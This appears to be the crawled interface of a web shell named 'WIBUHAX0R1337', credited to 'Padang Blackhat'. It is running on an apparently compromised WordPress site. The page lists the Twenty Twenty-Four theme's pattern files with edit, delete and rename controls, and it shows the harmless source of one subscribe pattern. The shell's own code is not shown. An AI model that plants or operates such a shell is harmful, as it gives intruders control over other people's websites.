-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
public_html
/
wp-content
/
themes
/
twentytwentyfour
/
patterns
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
.htaccess
0.231KB
Edit File
Delete File
Rename
banner-hero.php
2.663KB
Edit File
Delete File
Rename
banner-project-description.php
2.423KB
Edit File
Delete File
Rename
cta-content-image-on-right.php
3.33KB
Edit File
Delete File
Rename
cta-pricing.php
13.291KB
Edit File
Delete File
Rename
cta-rsvp.php
3.599KB
Edit File
Delete File
Rename
cta-services-image-left.php
2.719KB
Edit File
Delete File
Rename
cta-subscribe-centered.php
2.542KB
Edit File
Delete File
Rename
error_log
0.952KB
Edit File
Delete File
Rename
footer-centered-logo-nav.php
1.266KB
Edit File
Delete File
Rename
footer-colophon-3-col.php
4.578KB
Edit File
Delete File
Rename
footer.php
5.997KB
Edit File
Delete File
Rename
gallery-full-screen-image.php
1.372KB
Edit File
Delete File
Rename
gallery-offset-images-grid-2-col.php
2.737KB
Edit File
Delete File
Rename
gallery-offset-images-grid-3-col.php
4.755KB
Edit File
Delete File
Rename
gallery-offset-images-grid-4-col.php
6.144KB
Edit File
Delete File
Rename
gallery-project-layout.php
4.378KB
Edit File
Delete File
Rename
hidden-404.php
0.617KB
Edit File
Delete File
Rename
hidden-comments.php
1.571KB
Edit File
Delete File
Rename
hidden-no-results.php
0.286KB
Edit File
Delete File
Rename
hidden-portfolio-hero.php
0.803KB
Edit File
Delete File
Rename
hidden-post-meta.php
1.035KB
Edit File
Delete File
Rename
hidden-post-navigation.php
1.069KB
Edit File
Delete File
Rename
hidden-search.php
0.327KB
Edit File
Delete File
Rename
hidden-sidebar.php
4.545KB
Edit File
Delete File
Rename
page-home-portfolio-gallery.php
0.377KB
Edit File
Delete File
Rename
page-home-portfolio.php
0.389KB
Edit File
Delete File
Rename
page-newsletter-landing.php
2.818KB
Edit File
Delete File
Rename
page-portfolio-overview.php
0.599KB
Edit File
Delete File
Rename
page-rsvp-landing.php
3.986KB
Edit File
Delete File
Rename
posts-1-col.php
2.294KB
Edit File
Delete File
Rename
posts-3-col.php
2.619KB
Edit File
Delete File
Rename
posts-grid-2-col.php
3.695KB
Edit File
Delete File
Rename
posts-images-only-3-col.php
1.793KB
Edit File
Delete File
Rename
posts-images-only-offset-4-col.php
4.212KB
Edit File
Delete File
Rename
posts-list.php
3.312KB
Edit File
Delete File
Rename
team-4-col.php
6.546KB
Edit File
Delete File
Rename
template-archive-blogging.php
0.755KB
Edit File
Delete File
Rename
template-archive-portfolio.php
0.704KB
Edit File
Delete File
Rename
template-home-blogging.php
0.748KB
Edit File
Delete File
Rename
template-home-portfolio.php
0.851KB
Edit File
Delete File
Rename
template-index-blogging.php
0.898KB
Edit File
Delete File
Rename
template-index-portfolio.php
0.827KB
Edit File
Delete File
Rename
template-search-blogging.php
0.924KB
Edit File
Delete File
Rename
template-search-portfolio.php
0.973KB
Edit File
Delete File
Rename
template-single-portfolio.php
1.16KB
Edit File
Delete File
Rename
testimonial-centered.php
3.272KB
Edit File
Delete File
Rename
text-alternating-images.php
5.841KB
Edit File
Delete File
Rename
text-centered-statement-small.php
1.304KB
Edit File
Delete File
Rename
text-centered-statement.php
1.776KB
Edit File
Delete File
Rename
text-faq.php
8.115KB
Edit File
Delete File
Rename
text-feature-grid-3-col.php
7.739KB
Edit File
Delete File
Rename
text-project-details.php
3.392KB
Edit File
Delete File
Rename
text-title-left-image-right.php
3.348KB
Edit File
Delete File
Rename
<?php /** * Title: Centered call to action * Slug: twentytwentyfour/cta-subscribe-centered * Categories: call-to-action * Keywords: newsletter, subscribe, button */ ?> <!-- wp:group {"align":"full","style":{"spacing":{"padding":{"top":"var:preset|spacing|50","bottom":"var:preset|spacing|50","left":"var:preset|spacing|50","right":"var:preset|spacing|50"},"margin":{"top":"0","bottom":"0"}}},"layout":{"type":"constrained"}} --> <div class="wp-block-group alignfull" style="margin-top:0;margin-bottom:0;padding-top:var(--wp--preset--spacing--50);padding-right:var(--wp--preset--spacing--50);padding-bottom:var(--wp--preset--spacing--50);padding-left:var(--wp--preset--spacing--50)"> <!-- wp:group {"align":"wide","style":{"border":{"radius":"16px"},"spacing":{"padding":{"top":"var:preset|spacing|40","bottom":"var:preset|spacing|40","left":"var:preset|spacing|50","right":"var:preset|spacing|50"}}},"backgroundColor":"base-2","layout":{"type":"constrained"}} --> <div class="wp-block-group alignwide has-base-2-background-color has-background" style="border-radius:16px;padding-top:var(--wp--preset--spacing--40);padding-right:var(--wp--preset--spacing--50);padding-bottom:var(--wp--preset--spacing--40);padding-left:var(--wp--preset--spacing--50)"> <!-- wp:spacer {"height":"var:preset|spacing|10"} --> <div style="height:var(--wp--preset--spacing--10)" aria-hidden="true" class="wp-block-spacer"></div> <!-- /wp:spacer --> <!-- wp:heading {"textAlign":"center","fontSize":"x-large"} --> <h2 class="wp-block-heading has-text-align-center has-x-large-font-size"><?php echo esc_html_x( 'Join 900+ subscribers', 'Sample text for Subscriber Heading with numbers', 'twentytwentyfour' ); ?></h2> <!-- /wp:heading --> <!-- wp:paragraph {"align":"center"} --> <p class="has-text-align-center"><?php echo esc_html_x( 'Stay in the loop with everything you need to know.', 'Sample text for Subscriber Description', 'twentytwentyfour' ); ?></p> <!-- /wp:paragraph --> <!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} --> <div class="wp-block-buttons"> <!-- wp:button --> <div class="wp-block-button"> <a class="wp-block-button__link wp-element-button"><?php echo esc_html_x( 'Sign up', 'Sample text for Sign Up Button', 'twentytwentyfour' ); ?></a> </div> <!-- /wp:button --> </div> <!-- /wp:buttons --> <!-- wp:spacer {"height":"var:preset|spacing|10"} --> <div style="height:var(--wp--preset--spacing--10)" aria-hidden="true" class="wp-block-spacer"></div> <!-- /wp:spacer --> </div> <!-- /wp:group --> </div> <!-- /wp:group -->
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat